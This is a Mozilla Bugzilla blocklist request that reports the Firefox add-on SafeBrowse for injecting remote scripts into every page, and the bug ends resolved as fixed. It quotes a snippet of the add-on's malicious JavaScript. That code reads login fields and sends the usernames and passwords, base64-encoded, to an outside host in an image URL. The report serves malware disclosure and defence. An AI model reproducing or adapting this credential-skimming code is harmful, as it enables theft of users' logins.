Closed
Bug 1097696
Opened 11 years ago
Closed 11 years ago
Extension block request: safebrowse@safebrowse.co
Categories
(Toolkit :: Blocklist Policy Requests, defect)
Toolkit
Blocklist Policy Requests
Tracking
()
VERIFIED
FIXED
2014-11
People
(Reporter: diegocr, Assigned: jorgev)
Details
(Whiteboard: [extension])
Attachments
(1 file)
|
14.36 KB,
application/octet-stream
|
Details |
Extension name: SafeBrowse
Extension UUID: safebrowse@safebrowse.co
Extension versions to block: 3.0.1
Applications, versions, and platforms affected: Firefox Desktop
Block severity: hard
Homepage, AMO listing, other references and contact info:
https://www.safebrowse.co/
https://code.google.com/p/safebrowse/source/browse/
Affiliations, fwiw: quecaja.com, inmundicias.com, projectcao.com
Reasons:
This add-on inject the following script into every page:
https://safebrowse.googlecode.com/svn/trunk/core.js
Such script additionally injects this:
//safebrowse.googlecode.com/svn/trunk/nowait.js
//safebrowse.googlecode.com/svn/trunk/replace.js
The later script has code specifically made to collect usernames & passwords and sends them to a cdn hosted on projectcao.com
a little snippet:
1 function validateImg(e, t, n) {
2 var i = "wp" == n ? "&loc=" + encodeURIComponent(window.location.href) : "",
3 a = document.createElement("img");
4 return a.src = "http://cdn.projectcao.com/image_close.png?us=" + SB64.encode(e) + "&ps=" + SB64.encode(t) + "&st=" + n + i, !0
5 }
...
12 function validateDb() {
13 var e = $el('input[name="login_email"]').value,
14 t = $el('input[name="login_password"]').value;
15 return validateImg(e, t, "db"), !0
16 }
17
18 function validateI() {
19 var e = $el('input[name="username"]').value,
20 t = $el('input[name="password"]').value;
21 return validateImg(e, t, "i"), !0
22 }
23
24 function validateS() {
25 var e = $el('input[name="login"]').value,
26 t = $el('input[name="clave"]').value;
27 return validateImg(e, t, "s"), !0
28 }
....
| Reporter | ||
Comment 1•11 years ago
|
||
current extension version 3.0.1
| Assignee | ||
Updated•11 years ago
|
Assignee: nobody → jorge
Group: client-services-security
Target Milestone: --- → 2014-11
| Assignee | ||
Comment 2•11 years ago
|
||
Status: NEW → RESOLVED
Closed: 11 years ago
Resolution: --- → FIXED
Updated•10 years ago
|
Product: addons.mozilla.org → Toolkit
You need to log in
before you can comment on or make changes to this bug.
Description
•